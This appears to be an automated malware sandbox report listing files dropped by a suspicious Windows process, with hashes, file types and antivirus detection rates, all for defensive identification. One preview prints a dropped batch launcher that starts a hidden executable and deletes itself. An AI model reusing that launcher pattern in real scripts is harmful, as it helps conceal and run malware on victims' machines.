                                                            SHA-256:D02D3BF6564D23517300726E1A4FCB2C949A7E3700B70A9BD98E226557FF9CA8
                                                            SHA-512:A9701F6689ACCFF43ACF81AFAA657CDAAEC0CC3E17AC4569CA8FCD259CF32F05BA3D5C123F95535637D5ACB58F844CDED4DBE5A98FE5659507D01C5DBA0A2A87
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\XJsEcPfXWC.bat"
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.133660689688186
                                                            Encrypted:false
                                                            SSDEEP:3:zPhN9K4vtyQgn:jh2441
                                                            MD5:C5BD9470B83AF69B3B6BB6D6DC4AA763
                                                            SHA1:51C96FFDD6D383245588463BAE4C4D48FCA2D043
                                                            SHA-256:AA75D92D2296D1D304F31B1D5D1CB308312CF3A7670044CBE2D08D14B137B21C
                                                            SHA-512:14BC25C6AECFC5219ABBC0EAD7D4AF2771457387581BB4D09143888511DE215B9E5F83C46043DC24D24A8A2327D88C54A7FA512F7EF3D87521BB93B3BDA4D178
                                                            Malicious:false
                                                            Preview:otLEjn0huMOvrAlpht6vtHWuE
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with very long lines (744), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):744
                                                            Entropy (8bit):5.896392545627124
                                                            Encrypted:false
                                                            SSDEEP:12:jOAhvl1WSJzeTNlw4z8eakeN56tZQ+jd33qgLQUDz7sf2Fm7T/h6w5OEoENg2wfZ:jV3EKyT0w8eamxqGQY8XTxYEok4m1Tjc
                                                            MD5:57EAE854B5DA95F1BE6521E8455D79CF
                                                            SHA1:BBBB4F3CD780E8E64254037D05B1024121FB2B16
                                                            SHA-256:28D1630FABF1F1BF12161E5AF8DB0EA7CD11899B320EE986976A037B18B1C2C9
                                                            SHA-512:777C7A4CF28D76E355D800B1A786BDB482A8B893A70BB24C65421604293A01C79495E47E7FCC3F7E78C5507E4880ED9424653435D1A5B093309B1234873A246D
                                                            Malicious:false
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1300992
                                                            Entropy (8bit):5.0586566573608085
                                                            Encrypted:false
                                                            SSDEEP:24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
                                                            MD5:295BF8D9B734730EFA567C8DA9918FE1
                                                            SHA1:09AABC018DA124BD0EBE8E1043860015AC71AA34
                                                            SHA-256:7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
                                                            SHA-512:C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                            • Antivirus: Virustotal, Detection: 69%
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):5.541771649974822
                                                            Encrypted:false
                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                            • Antivirus: Virustotal, Detection: 4%
                                                            Joe Sandbox View:
                                                            • Filename: LabyMod.exe, Detection: malicious
                                                            • Filename: jWPW3CjSsa.exe, Detection: malicious
                                                            • Filename: 6v2t5igkn8.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: 68ebff4655ce8e3641602b31a0f12adcd4f5d0813604655a309fd881.exe, Detection: malicious
                                                            • Filename: Sentares_Hack_#U2014_#U043a#U043e#U043f#U0438#U044f.exe, Detection: malicious
                                                            • Filename: LYOTMT26Vl.exe, Detection: malicious
                                                            • Filename: 4J576dHwVU.exe, Detection: malicious
                                                            • Filename: sw9ofrTPS0.exe, Detection: malicious
                                                            • Filename: jHednJXHgj.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.660491370279985
                                                            Encrypted:false
                                                            SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                            MD5:240E98D38E0B679F055470167D247022
                                                            SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                            SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                            SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            • Antivirus: Virustotal, Detection: 9%
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):69632
                                                            Entropy (8bit):5.932541123129161
                                                            Encrypted:false
                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                            • Antivirus: Virustotal, Detection: 13%
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):64000
                                                            Entropy (8bit):5.857602289000348
                                                            Encrypted:false
                                                            SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                            MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                            SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                            SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                            SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            • Antivirus: Virustotal, Detection: 4%
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23552
                                                            Entropy (8bit):5.519109060441589
                                                            Encrypted:false
                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            • Antivirus: Virustotal, Detection: 7%
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):46592
                                                            Entropy (8bit):5.870612048031897
                                                            Encrypted:false
                                                            SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                            MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                            SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                            SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                            SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            • Antivirus: Virustotal, Detection: 7%
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):85504
                                                            Entropy (8bit):5.8769270258874755
                                                            Encrypted:false
                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 34%
                                                            • Antivirus: Virustotal, Detection: 33%
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):85504
                                                            Entropy (8bit):5.8769270258874755
                                                            Encrypted:false
                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 34%
                                                            • Antivirus: Virustotal, Detection: 33%
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.629584586954759
                                                            Encrypted:false
                                                            SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                            MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                            SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                            SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                            SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            • Antivirus: Virustotal, Detection: 4%
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34304
                                                            Entropy (8bit):5.618776214605176
                                                            Encrypted:false
                                                            SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                            MD5:9B25959D6CD6097C0EF36D2496876249
                                                            SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                            SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                            SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                            • Antivirus: Virustotal, Detection: 4%
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):70144
                                                            Entropy (8bit):5.909536568846014
                                                            Encrypted:false
                                                            SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                            MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                            SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                            SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                            SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                            • Antivirus: Virustotal, Detection: 4%
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34816
                                                            Entropy (8bit):5.636032516496583
                                                            Encrypted:false
                                                            SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                            MD5:996BD447A16F0A20F238A611484AFE86
                                                            SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                            SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                            SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            • Antivirus: Virustotal, Detection: 9%
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):64000
                                                            Entropy (8bit):5.857602289000348
                                                            Encrypted:false
                                                            SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                            MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                            SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                            SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                            SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            • Antivirus: Virustotal, Detection: 4%
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.660491370279985
                                                            Encrypted:false
                                                            SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                            MD5:240E98D38E0B679F055470167D247022
                                                            SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                            SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                            SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                            Malicious:true
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):38912
                                                            Entropy (8bit):5.679286635687991
                                                            Encrypted:false
                                                            SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                            MD5:9E910782CA3E88B3F87826609A21A54E
                                                            SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                            SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                            SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34304
                                                            Entropy (8bit):5.618776214605176
                                                            Encrypted:false
                                                            SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                            MD5:9B25959D6CD6097C0EF36D2496876249
                                                            SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                            SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                            SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                            Malicious:true
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):33792
                                                            Entropy (8bit):5.541771649974822
                                                            Encrypted:false
                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                            Malicious:true
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23552
                                                            Entropy (8bit):5.519109060441589
                                                            Encrypted:false
                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):46592
                                                            Entropy (8bit):5.870612048031897
                                                            Encrypted:false
                                                            SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                            MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                            SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                            SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                            SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):69632
                                                            Entropy (8bit):5.932541123129161
                                                            Encrypted:false
                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):39936
                                                            Entropy (8bit):5.629584586954759
                                                            Encrypted:false
                                                            SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                            MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                            SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                            SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                            SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):70144
                                                            Entropy (8bit):5.909536568846014
                                                            Encrypted:false
                                                            SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                            MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                            SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                            SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                            SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                            Malicious:true
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):34816
                                                            Entropy (8bit):5.636032516496583
                                                            Encrypted:false
                                                            SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                            MD5:996BD447A16F0A20F238A611484AFE86
                                                            SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                            SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                            SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                            Malicious:true
                                                            Process:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):38912
                                                            Entropy (8bit):5.679286635687991
                                                            Encrypted:false
                                                            SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                            MD5:9E910782CA3E88B3F87826609A21A54E
                                                            SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
